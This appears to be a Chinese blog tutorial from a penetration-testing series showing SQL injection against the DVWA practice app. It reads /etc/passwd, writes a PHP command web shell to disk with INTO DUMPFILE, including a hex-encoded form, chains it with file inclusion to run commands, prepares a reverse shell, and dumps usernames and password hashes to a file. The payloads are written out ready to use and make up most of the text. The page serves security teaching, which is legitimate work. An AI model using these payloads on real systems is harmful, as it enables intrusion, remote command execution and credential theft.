二十二、SQL注入(3)读取/写入/下载数据文件
2017-11-10 本文已影响0人
cybeyond
1、读取文件
' union select null, load_file('/etc/passwd')--+
![](https://img.haomeiwen.com/i4593121/b74d968392e62eaa.png)
![](https://img.haomeiwen.com/i4593121/d286c963510ed865.png)
2、写入文件
mysql的默认家目录的属主属组都是mysql,想要写入的a.php放在/var/www/目录下(为方便http访问时执行命令),但/var/www/目录下的属主、属组为www-data,mysql用户没有权限写入,因此下面的命令会执行不成功。
' union select null,"<?php passthru($_GET['cmd']); ?>" INTO DUMPFILE "/var/www/a.php" --+
![](https://img.haomeiwen.com/i4593121/a9f6cce463f7ec28.png)
' union select null,"<?php passthru($_GET['cmd']); ?>" INTO DUMPFILE "a.php" --+ //默认会放到/va/lib/mysql/dvwa/目录下
![](https://img.haomeiwen.com/i4593121/786a6d15df09d84f.png)
![](https://img.haomeiwen.com/i4593121/1bb6759cbff10e58.png)
但是结合上一章节的文件包含漏洞,由于/tmp目录是一个特殊的目录,所有人具有rwx权限,是不是能利用上述的写入文件到/tmp目录下,然后结合之前的文件包含在include进来,达到想要的效果呢?
将文件写入到/tmp/aa.php
' union select null,"<?php passthru($_GET['cmd']); ?>" into dumpfile "/tmp/aa.php"--+
![](https://img.haomeiwen.com/i4593121/dd9fc397a0c0f75a.png)
使用file include利用aa.php执行命令
![](https://img.haomeiwen.com/i4593121/7e68c4b11f646c6d.png)
3、使用反弹shell执行sql注入
复制反弹shell脚本
#/usr/share/webshells/php# cp php-reverse-shell.php /root/b.php //复制反弹脚本到/root目录下
修改脚本反弹IP,为kali本机IP
![](https://img.haomeiwen.com/i4593121/e49bbf89ff870a60.png)
编码十六进制转换此反弹shell
cat b.php | xxd -ps | tr -d '\n' //xxd为十六进制转换,使用tr删除转换后的换行,所有为一行输出
![](https://img.haomeiwen.com/i4593121/a6c6b4a412460e6c.png)
换一个方法,尝试将上面的一句话木马转换为16进制然后执行
将<?php passthru($_GET['cmd']); ?>
写入c.php中,并转换十六进制:
![](https://img.haomeiwen.com/i4593121/601d7225e14a38b5.png)
执行sql注入,并将十六进制数据写入/tmp/cc.php
' union select null,(0x3c3f70687020706173737468727528245f4745545b27636d64275d293b203f3e0a) INTO DUMPFILE "/tmp/cc.php" --+
查看/tmp/cc.php,已经是服务端转换后的代码了:
![](https://img.haomeiwen.com/i4593121/1c85675f2c38f412.png)
![](https://img.haomeiwen.com/i4593121/00c8debcf1a515d1.png)
4、保存下载数据库
将用户名、密码表保存在职至/tmp/aa.db中
' union select null, concat(user,0x3a,password) from users INTO OUTFILE '/tmp/aa.db'--
然后通过file include访问/tmp/aa.db文件
![](https://img.haomeiwen.com/i4593121/cf02beddc8529b2f.png)